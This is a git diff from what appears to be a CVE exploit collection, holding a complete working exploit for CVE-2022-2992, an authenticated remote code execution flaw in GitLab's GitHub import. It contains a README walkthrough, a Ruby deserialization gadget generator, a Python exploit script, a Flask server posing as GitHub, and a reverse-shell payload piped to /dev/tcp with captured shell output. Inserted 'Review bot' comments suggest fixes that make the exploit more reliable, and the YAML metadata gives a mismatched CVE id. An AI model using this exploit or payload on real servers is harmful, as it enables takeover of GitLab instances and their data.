Please read the documentation [here](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html) -5) Finally firing off our [exploit.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/exploit.py). - -**NOTE**: Before running make sure ngrok and flask server are running. -```py -python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example -``` -- We get a shell back on port 443 -```bash -➜ CVE-2022-2992: nc -nlvp 443 -listening on [any] 443 ... -connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270 -sh: 0: can't access tty; job control turned off -$ id -uid=998(git) gid=998(git) groups=998(git) -``` - ---- -### Expected output in each window: -- Ngrok -```http -POST /vakzz/public.git/git-upload-pack 200 OK -GET /vakzz/public.git/info/refs 200 OK -GET /api/v3/repos/fake/name 200 OK -GET /api/v3/repositories/12345 200 OK -GET /api/v3/rate_limit 200 OK -GET /api/v3/rate_limit 200 OK -``` -- Exploit -```py -[1] Creating Group -[+] Successfully created group: qogjohpykk -[2] Running flask server -[3] Importing Github Repo - * Serving Flask app "server" (lazy loading) - * Environment: production - WARNING: This is a development server. Do not use it in a production deployment. - Use a production WSGI server instead. 
- * Debug mode: off - * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit) -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 - -201 -127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 - -[4] Triggering Payload -[+] Command was executed -``` ---- - -## Environment -- Tested on Gitlab 15.3.1 Enterprise Edition -- For building your own environment for testing, copy the [data](https://github.com/CsEnox/CVE-2022-2992/tree/main/data) directory to `/` on your Linux VM. -- Run build.sh to setup the environment. Once the script finishes executing you can login using the following credentials on gitlab. -``` -Username: enox -Email: enox@gitlab.example -Password: StrongestGitlabPassword -``` ---- - -## Credits -- https://hackerone.com/reports/1679624 (vakzz) -- https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html - -If you have any questions reach out to me on [Discord](https://discord.com/) (Enox#4458) +# CVE-2022-2992 +Authenticated Remote Command Execution in Gitlab via GitHub import. +> A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. 
+ +https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#remote-command-execution-via-github-import + +## Prerequisites +- [Ngrok](https://ngrok.com/) +- Ruby +- Redis +- Python3 +- Flask +``` +sudo apt install ruby python3 python3-pip +gem install redis +pip install flask +``` +--- +## Steps +1) Run `./ngrok http 5000` and save the URL. +2) Now to generate the serialized payload run [payload_gen.rb](https://github.com/CsEnox/CVE-2022-2992/blob/main/payload_gen.rb) and save the payload. Below is an example: +```bash +ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"' +``` +3) In [server.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/server.py) update NGROK_URL and PAYLOAD variables accordingly. Below is an example: +```py +PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve' +NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io' +``` +4) Create an access token for the user on gitlab and select all scopes. Please read the documentation [here](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html) +5) Finally firing off our [exploit.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/exploit.py). + +**NOTE**: Before running make sure ngrok and flask server are running. 
+```py +python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example +``` +- We get a shell back on port 443 +```bash +➜ CVE-2022-2992: nc -nlvp 443 +listening on [any] 443 ... +connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270 +sh: 0: can't access tty; job control turned off +$ id +uid=998(git) gid=998(git) groups=998(git) +``` + +--- +### Expected output in each window: +- Ngrok +```http +POST /vakzz/public.git/git-upload-pack 200 OK +GET /vakzz/public.git/info/refs 200 OK +GET /api/v3/repos/fake/name 200 OK +GET /api/v3/repositories/12345 200 OK +GET /api/v3/rate_limit 200 OK +GET /api/v3/rate_limit 200 OK +``` +- Exploit +```py +[1] Creating Group +[+] Successfully created group: qogjohpykk +[2] Running flask server +[3] Importing Github Repo + * Serving Flask app "server" (lazy loading) + * Environment: production + WARNING: This is a development server. Do not use it in a production deployment. + Use a production WSGI server instead. + * Debug mode: off + * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit) +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 - +201 +127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 - +[4] Triggering Payload +[+] Command was executed +``` +--- + +## Environment +- Tested on Gitlab 15.3.1 Enterprise Edition +- For building your own environment for testing, copy the [data](https://github.com/CsEnox/CVE-2022-2992/tree/main/data) directory to `/` on your Linux VM. +- Run build.sh to setup the environment. 
Once the script finishes executing you can login using the following credentials on gitlab. +``` +Username: enox +Email: enox@gitlab.example +Password: StrongestGitlabPassword +``` +--- + +## Credits +- https://hackerone.com/reports/1679624 (vakzz) +- https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html + +If you have any questions reach out to me on [Discord](https://discord.com/) (Enox#4458) diff --git a/cve/gitlab/2022/CVE-2022-2992/exploit.py b/cve/gitlab/2022/CVE-2022-2992/exploit.py index 63d30a44..e59f5de0 100644 --- a/cve/gitlab/2022/CVE-2022-2992/exploit.py +++ b/cve/gitlab/2022/CVE-2022-2992/exploit.py 
@@ -1,52 +1,52 @@ -import requests -import time -import random -import string -import argparse -import threading -from server import * - -parser = argparse.ArgumentParser(description='CVE-2022-2992 - Gitlab Authenticated RCE via Github Import') -parser.add_argument('-a', help='Auth-Token', required=True) -parser.add_argument('-u', help='Attacker Repo URL (Eg: https://ba20-40-33-92-70.in.ngrok.io)', required=True) -parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) -args = parser.parse_args() - -auth_token = args.a -gitlab_url = args.t -attacker_url = args.u - -session = requests.Session() - -print("[1] Creating Group") -group_name =''.join(random.choices(string.ascii_lowercase, k=10)) -headers = {'PRIVATE-TOKEN': auth_token} -data = {'name':group_name,'path':group_name,'visibility':'public'} -r = session.post(gitlab_url+"/api/v4/groups", headers=headers, data=data) - -if r.status_code != 201: - print(r.text) - exit("Failed to create group, check your auth token.") -else: - print("[+] Successfully created group: "+group_name) - -print("[2] Running flask server") -def runserver(): - app.run(host='0.0.0.0', port='5000', debug=False) -t1 = threading.Thread(target=runserver) -t1.start() - -print("[3] Importing Github Repo") -data= {'personal_access_token':'fake_token','repo_id':'12345','target_namespace':group_name,'new_name':'gh-import-420','github_hostname':attacker_url} -r = session.post(gitlab_url+"/api/v4/import/github",headers=headers,data=data) -print(r.status_code) -time.sleep(5) - -print("[4] Triggering Payload") -headers = {'Cookie':'_gitlab_session=gggg'} -r = session.get(gitlab_url+"/"+group_name, headers=headers) - -if r.status_code != 500: - exit("[-] Exploit failed") -else: - print("[+] Command was executed") +import requests +import time +import random +import string +import argparse +import threading +from server import * + +parser = argparse.ArgumentParser(description='CVE-2022-2992 - Gitlab Authenticated RCE via 
Github Import') +parser.add_argument('-a', help='Auth-Token', required=True) +parser.add_argument('-u', help='Attacker Repo URL (Eg: https://ba20-40-33-92-70.in.ngrok.io)', required=True) +parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) +args = parser.parse_args() + +auth_token = args.a +gitlab_url = args.t +attacker_url = args.u + +session = requests.Session() + +print("[1] Creating Group") +group_name =''.join(random.choices(string.ascii_lowercase, k=10)) +headers = {'PRIVATE-TOKEN': auth_token} +data = {'name':group_name,'path':group_name,'visibility':'public'} +r = session.post(gitlab_url+"/api/v4/groups", headers=headers, data=data) + +if r.status_code != 201: + print(r.text) + exit("Failed to create group, check your auth token.") +else: + print("[+] Successfully created group: "+group_name) + +print("[2] Running flask server") +def runserver(): + app.run(host='0.0.0.0', port='5000', debug=False) +t1 = threading.Thread(target=runserver) +t1.start() + +print("[3] Importing Github Repo") +data= {'personal_access_token':'fake_token','repo_id':'12345','target_namespace':group_name,'new_name':'gh-import-420','github_hostname':attacker_url} +r = session.post(gitlab_url+"/api/v4/import/github",headers=headers,data=data) +print(r.status_code) +time.sleep(5) + +print("[4] Triggering Payload") +headers = {'Cookie':'_gitlab_session=gggg'} +r = session.get(gitlab_url+"/"+group_name, headers=headers) + +if r.status_code != 500: + exit("[-] Exploit failed") +else: + print("[+] Command was executed") diff --git a/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb b/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb index 62ec1228..a29e95a6 100644 --- a/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb +++ b/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb 
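Review bot: The Flask thread started with `t1 = threading.Thread(target=runserver)` is not a daemon, so after `exit("[-] Exploit failed")` or the final success message the interpreter keeps running until the operator kills it; `t1 = threading.Thread(target=runserver, daemon=True)` lets the script exit on its own. The success check `if r.status_code != 500` treats any server error on the group page as proof the gadget fired, so a 500 caused by an unrelated problem (wrong session store, unreachable callback host) is printed as `[+] Command was executed`; the reverse-shell callback described in the README is the real confirmation and a comment on that branch should say so. The public group created in step 1 and the `gh-import-420` import are never removed, which matters on a customer target; a `DELETE /api/v4/groups/<id>` at the end, or at least a printed reminder, would help. As far as I can tell this hunk only rewrites line endings, so the code itself carries over unchanged from the previous revision.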
@@ -1,49 +1,49 @@ -require 'redis' -require 'json' -# NOTE: Made by vakzz I only made some minor changes - - -if ARGV.length < 1 - puts "[!] Please pass command argument" - puts 'Example: ruby payload.rb "whoami > /tmp/test"' - exit -end - -# Autoload the required classes -Gem::SpecFetcher -Gem::Installer - -# prevent the payload from running when we Marshal.dump it -module Gem - class Requirement - def marshal_dump - [@requirements] - end - end -end - -wa1 = Net::WriteAdapter.new(Kernel, :system) - -rs = Gem::RequestSet.allocate -rs.instance_variable_set('@sets', wa1) -rs.instance_variable_set('@git_set', "#{ARGV[0]}") - -wa2 = Net::WriteAdapter.new(rs, :resolve) - -i = Gem::Package::TarReader::Entry.allocate -i.instance_variable_set('@read', 0) -i.instance_variable_set('@header', 'aaa') - -n = Net::BufferedIO.allocate -n.instance_variable_set('@io', i) -n.instance_variable_set('@debug_output', wa2) - -t = Gem::Package::TarReader.allocate -t.instance_variable_set('@io', n) - -r = Gem::Requirement.allocate -r.instance_variable_set('@requirements', t) - -payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) -a = "ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$"+((payload.length).to_s)+"\r\n"+payload -puts a.to_json +require 'redis' +require 'json' +# NOTE: Made by vakzz I only made some minor changes + + +if ARGV.length < 1 + puts "[!] 
Please pass command argument" + puts 'Example: ruby payload.rb "whoami > /tmp/test"' + exit +end + +# Autoload the required classes +Gem::SpecFetcher +Gem::Installer + +# prevent the payload from running when we Marshal.dump it +module Gem + class Requirement + def marshal_dump + [@requirements] + end + end +end + +wa1 = Net::WriteAdapter.new(Kernel, :system) + +rs = Gem::RequestSet.allocate +rs.instance_variable_set('@sets', wa1) +rs.instance_variable_set('@git_set', "#{ARGV[0]}") + +wa2 = Net::WriteAdapter.new(rs, :resolve) + +i = Gem::Package::TarReader::Entry.allocate +i.instance_variable_set('@read', 0) +i.instance_variable_set('@header', 'aaa') + +n = Net::BufferedIO.allocate +n.instance_variable_set('@io', i) +n.instance_variable_set('@debug_output', wa2) + +t = Gem::Package::TarReader.allocate +t.instance_variable_set('@io', n) + +r = Gem::Requirement.allocate +r.instance_variable_set('@requirements', t) + +payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) +a = "ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$"+((payload.length).to_s)+"\r\n"+payload +puts a.to_json diff --git a/cve/gitlab/2022/CVE-2022-2992/server.py b/cve/gitlab/2022/CVE-2022-2992/server.py index 7e8db2e5..9e871bf7 100644 --- a/cve/gitlab/2022/CVE-2022-2992/server.py +++ b/cve/gitlab/2022/CVE-2022-2992/server.py 
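Review bot: `require 'redis'` is never used — the script builds the RESP `SET` frame by hand and only needs `json` — so that line and the `gem install redis` prerequisite in the README can go. The usage hint `puts 'Example: ruby payload.rb "whoami > /tmp/test"'` names a file that does not exist in this directory; it should read `ruby payload_gen.rb ...`. The hard-coded `$19` bulk-string length belongs to `session:gitlab:gggg`, which must stay in step with the `_gitlab_session=gggg` cookie exploit.py sends, so a comment such as `# 19 == "session:gitlab:gggg".bytesize; keep in sync with exploit.py` on that line would prevent a silently malformed frame. Note also that `Marshal.dump` returns a binary string and `to_json` raises on byte sequences that are not valid UTF-8, so long or non-ASCII commands may fail at `puts a.to_json` — worth confirming before relying on it.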
@@ -1,92 +1,92 @@ -from flask import Flask, request, Response, send_file, jsonify -import requests -import json -# Made by vakzz -HTTP_METHODS = [ - "GET", - "HEAD", - "POST", - "PUT", - "DELETE", - "CONNECT", - "OPTIONS", - "TRACE", - "PATCH", -] -app = Flask(__name__) - -# NOTE: Update these 2 variables -PAYLOAD = '' -NGROK_URL = '' - - -REPO_JSON = { - "id": 12345, - "name": "fake", - "full_name": "fake/name", - "clone_url": NGROK_URL + "/vakzz/public.git", -} - - -@app.route("/vakzz/public.git/info/refs") -def git_refs(): - return ( - b"001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000", - 200, - {"Content-Type": "application/x-git-upload-pack-advertisement"}, - ) - - -@app.route("/vakzz/public.git/git-upload-pack", methods=["POST"]) -def git_pack(): - return ( - b'0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects: 33% (1/3)\r0022\x02Counting objects: 66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 
\x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000', - 200, - {"Content-Type": "application/x-git-upload-pack-result"}, - ) - - -@app.before_request -def log_request(): - app.logger.debug("Request Path %s", request.path) - app.logger.debug("Request Data %s", request.data) - return None - - -@app.route("/repositories/12345") -def repo(): - return jsonify(REPO_JSON) - - -@app.route("/api/v3/repositories/12345") -def repo_legacy(): - return jsonify(REPO_JSON) - - -@app.route("/api/v3/repos/fake/name") -def repo_info(): - return jsonify( - { - "default_branch": { - "to_s": { - "to_s": PAYLOAD, - "bytesize": 3, - } - } - } 
- ) - - -@app.route("/api/v3/rate_limit") -def rate_limit(): - return ( - jsonify({}), - 200, - {"X-RateLimit-Limit": "100000", "X-RateLimit-Remaining": "100000"}, - ) - - -@app.route("/", defaults={"path": ""}, methods=HTTP_METHODS) -@app.route("/", methods=HTTP_METHODS) -def proxy(path): - return jsonify({}) +from flask import Flask, request, Response, send_file, jsonify +import requests +import json +# Made by vakzz +HTTP_METHODS = [ + "GET", + "HEAD", + "POST", + "PUT", + "DELETE", + "CONNECT", + "OPTIONS", + "TRACE", + "PATCH", +] +app = Flask(__name__) + +# NOTE: Update these 2 variables +PAYLOAD = '' +NGROK_URL = '' + + +REPO_JSON = { + "id": 12345, + "name": "fake", + "full_name": "fake/name", + "clone_url": NGROK_URL + "/vakzz/public.git", +} + + +@app.route("/vakzz/public.git/info/refs") +def git_refs(): + return ( + b"001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000", + 200, + {"Content-Type": "application/x-git-upload-pack-advertisement"}, + ) + + +@app.route("/vakzz/public.git/git-upload-pack", methods=["POST"]) +def git_pack(): + return ( + b'0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects: 33% (1/3)\r0022\x02Counting objects: 66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), 
done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000', + 200, + {"Content-Type": "application/x-git-upload-pack-result"}, + ) + + +@app.before_request +def log_request(): + app.logger.debug("Request Path %s", request.path) + 
app.logger.debug("Request Data %s", request.data) + return None + + +@app.route("/repositories/12345") +def repo(): + return jsonify(REPO_JSON) + + +@app.route("/api/v3/repositories/12345") +def repo_legacy(): + return jsonify(REPO_JSON) + + +@app.route("/api/v3/repos/fake/name") +def repo_info(): + return jsonify( + { + "default_branch": { + "to_s": { + "to_s": PAYLOAD, + "bytesize": 3, + } + } + } + ) + + +@app.route("/api/v3/rate_limit") +def rate_limit(): + return ( + jsonify({}), + 200, + {"X-RateLimit-Limit": "100000", "X-RateLimit-Remaining": "100000"}, + ) + + +@app.route("/", defaults={"path": ""}, methods=HTTP_METHODS) +@app.route("/", methods=HTTP_METHODS) +def proxy(path): + return jsonify({}) diff --git a/cve/gitlab/2022/yaml/CVE-2022-2992.yaml b/cve/gitlab/2022/yaml/CVE-2022-2992.yaml index 4600a13b..531d568c 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-2992.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-2992.yaml 
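Review bot: `REPO_JSON["clone_url"]` is evaluated at import time from `NGROK_URL`, which ships as `''`, so unless the constant is edited before exploit.py imports this module GitLab receives a relative `/vakzz/public.git` clone URL and never reaches the `git-upload-pack` route; exploit.py already takes the attacker host via `-u`, so passing it into this module (or building `REPO_JSON` lazily from it) removes the second hard-coded copy. The function named `proxy` is not a catch-all: both decorators bind only `/` and there is no `/<path:path>` rule, so any other path GitLab requests gets a Flask 404 rather than `{}`; I cannot tell from here whether the importer hits such paths, but `@app.route("/<path:path>", methods=HTTP_METHODS)` is what the `defaults={"path": ""}` pattern expects. The `log_request` hook only logs at DEBUG while exploit.py runs the app with `debug=False`, so those lines print nothing during a real run. `requests`, `json`, `Response` and `send_file` are imported but unused.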
@@ -1,27 +1,27 @@ -id: CVE-2022-2992 -source: https://github.com/CsEnox/CVE-2022-2992 -info: - name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 - severity: critical - description: | - A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. - scope-of-influence: - 11.10 <= GitLab(CE/EE)< 15.1.6 - 15.2 <= GitLab(CE/EE)< 15.2.4 - 15.3 <= GitLab(CE/EE)< 15.3.2 - reference: - - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json - - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json - - http://packetstormsecurity.com/files/171008/GitLab-GitHub-Repo-Import-Deserialization-Remote-Code-Execution.html - - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 - - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 - - https://hackerone.com/reports/1679624 - - https://hackerone.com/reports/1679624 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.9 - cve-id: CVE-2022-2292 - cwe-id: CWE-77 - cnvd-id: None - kve-id: None +id: CVE-2022-2992 +source: https://github.com/CsEnox/CVE-2022-2992 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: critical + description: | + A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. 
+ scope-of-influence: + 11.10 <= GitLab(CE/EE)< 15.1.6 + 15.2 <= GitLab(CE/EE)< 15.2.4 + 15.3 <= GitLab(CE/EE)< 15.3.2 + reference: + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json + - http://packetstormsecurity.com/files/171008/GitLab-GitHub-Repo-Import-Deserialization-Remote-Code-Execution.html + - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 + - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 + - https://hackerone.com/reports/1679624 + - https://hackerone.com/reports/1679624 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2022-2292 + cwe-id: CWE-77 + cnvd-id: None + kve-id: None tags: cve2022, gitlab \ No newline at end of file diff --git a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py index a7fac033..856961aa 100644 --- a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py +++ b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py 
